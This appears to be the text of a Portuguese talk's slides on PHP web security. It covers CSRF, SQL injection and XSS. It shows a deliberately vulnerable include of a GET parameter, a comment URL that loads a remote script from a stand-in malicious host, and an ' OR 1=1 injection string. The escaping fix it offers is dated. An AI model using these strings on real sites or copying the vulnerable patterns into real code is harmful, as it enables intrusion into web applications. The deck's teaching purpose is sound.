1. Mantenha suas aplicações protegidas contra usuários mal intencionados

3. Gerente de projetos - RPM

4. Consultor em Software Livre

5. 7 anos de experiência em Desenvolvimento

6. Analista de Sistemas

9. PHPConference, SOLISC e etc.

10. @kinncj, fb.com/kinncj, linkedin.com/in/kinncj

12. CSRF

13. INJECTION

14. XSS

16. XSS

17. XSS

20. <?php

21. include $_GET['pagina'];

22. // http://localhost/pagina=http://sitedomal.com/script.txt

24. <?php

25. $paginas = array('home','admin');

26. if(in_array($_GET['pagina'],$paginas)){

27. include “../paginas/”.$_GET['pagina'].”.php”;

28. }else{

29. echo “Ops, pagina nao encontrada”;

30. }

31. // http://localhost/pagina=http://sitedomal.com/script.txt

32. CSRF

35. SQL Injection

37. SQL Injection

39. $query_string = &quot;SELECT * FROM usuarios WHERE codigo = '{$usuario}' AND senha = '{$senha}'&quot;;

41. SELECT * FROM usuarios WHERE codigo = '' OR 1=1 AND senha = '' OR 1=1

42. PHP

43. $usuario = mysql_real_escape_string(addslashes($usuario));

44. $senha = mysql_real_escape_string(addslashes($senha));

45. $query_string = &quot;SELECT * FROM usuarios WHERE codigo = '{$usuario}' AND senha = '{$senha}'&quot;

48. CSRF

49. Injection